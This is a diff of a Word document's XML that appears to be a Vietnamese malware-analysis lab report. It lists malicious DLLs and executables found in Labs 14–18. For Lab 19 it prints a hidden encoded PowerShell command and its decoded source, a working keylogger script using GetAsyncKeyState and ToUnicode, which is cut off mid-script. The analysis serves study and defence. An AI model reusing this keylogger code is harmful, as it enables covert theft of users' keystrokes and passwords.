--- a/chall6/Report.docx
+++ b/chall6/Report.docx
@@ -1386,12 +1386,21 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
           <w:color w:val="1F2328"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>Lab13:</w:t>
       </w:r>
     </w:p>
@@ -1418,6 +1427,1225 @@
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
         <w:t xml:space="preserve"> được dùng trên lsm cùng thư mục</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Lab14:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mã độc dll trong </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>"C:\Windows\QcLite.dll"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> được gọi bởi QcConsole </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Lab15:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E5B130" wp14:editId="08994622">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1917777971" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1917777971" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Lab16:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Mã độc: “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>c:\users\public\regasm.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Lab17:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Mã độc: “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>c:\windows\system32\mimilib.dll</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (dll này có verifed nhưng mà vẫn là malware?)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Lab18:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Mã độc: “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>C:\Windows\apppatch\NvSmartMax.dll</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>” được gọi bởi NvSmart.exe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Lab 19:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Ta thấy được có một tiến trình power shell chạy đoạn mã như sau:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -windowstyle hidden -EncodedCommand IwByAGUAcQB1AGkAcgBlAHMAIAAtAFYAZQByAHMAaQBvAG4AIAAyAAoAZgB1AG4AYwB0AGkAbwBuACAAUwB0AGEAcgB0AC0ASwBlAHkATABvAGcAZwBlAHIAKAAkAFAAYQB0AGgAPQAiACQAZQBuAHYAOgB0AGUAbQBwAFwAbABvAGcAZgBpAGwAZQAuAHQAeAB0ACIAKQAgAAoAewAKACAAIAAj</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>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</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>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</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>Giải mã đoạn mã và xóa bớt kí tự thừa ta được đoạn code như sau:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>requires -Version 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>function Start-KeyLogger($Path="$env:temp\logfile.txt")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # Signatures for API Calls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $signatures = @'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>public static extern short GetAsyncKeyState(int virtualKeyCode);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto)]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>public static extern int GetKeyboardState(byte[] keystate);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto)]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>public static extern int MapVirtualKey(uint uCode, int uMapType);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto)]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>public static extern ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, StringBuilder pwzBuffer, int cchBuff, uint wFlags);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t>'@</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # load signatures and make members available</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $API = Add-Type -Type MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # create output file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $null = New-Item -Path $Path -ItemType File -Force</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    try</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">        # Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        # create endless loop. When user presses CTRL+C, finally-block</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        # executes and shows the collected key presses</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        while ($true) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            Start-Sleep -Milliseconds 40</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            # scan all ASCII codes above 8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            for ($ascii = 9; $ascii -le 254; $ascii++)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                if ($API::GetAsyncKeyState($ascii))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    # get current key state</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    $state = $API::GetKeyboardState([byte[]]@(0)*256)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    $checkkstate = $API::GetKeyboardState($kstate)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    # prepare a StringBuilder to receive input key</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    $mychar = New-Object -TypeName System.Text.StringBuilder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    # translate virtual key</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    $success = $API::ToUnicode($ascii, $API::MapVirtualKey($ascii, 0), $kstate, $mychar, $mychar.Capacity, 0)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    # translate virtual key</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    $mychar = New-Object -TypeName System.Text.StringBuilder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
